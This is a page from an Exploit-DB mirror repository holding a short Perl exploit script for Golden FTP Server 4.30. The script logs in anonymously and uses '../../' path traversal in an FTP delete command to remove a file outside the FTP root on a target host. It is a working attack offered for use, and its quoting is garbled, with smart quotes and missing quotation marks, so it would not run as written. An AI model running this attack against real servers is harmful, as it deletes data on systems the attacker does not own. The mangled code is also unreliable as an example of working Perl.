exploit-db-mirror/exploits/windows/remote/10258.pl
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

29 lines
No EOL
788 B
Perl
Executable file
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: [Golden FTP Server File Deletion Vulnerability]
# Date: [18.11.2009]
# Author: [sharpe]
# Software Link: [http://www.goldenftpserver.com/download.html]
# Version: [4.30 Free and Professional]
# Tested on: [Windows XP SP3]
# CVE : [if exists]
# Code : [http://blog.sat0ri.com/?p=292]
#---
#sat0ri - sudden enlightenment
#http://blog.sat0ri.com/
use strict;
use Net::FTP
my $ftp = Net::FTP->new(192.168.1.35″, Debug => 1) || die $@;
$ftp->login(anonymous, anonymous@local.host) || die $ftp->message;
# The FTP root is, via the configuration, set to C:\ftp\public
$ftp->cwd(/public/) || die $ftp->message;
# This deletes the file C:\bollocks.txt
$ftp->delete(../../bollocks.txt);
$ftp->quit;
$ftp = undef;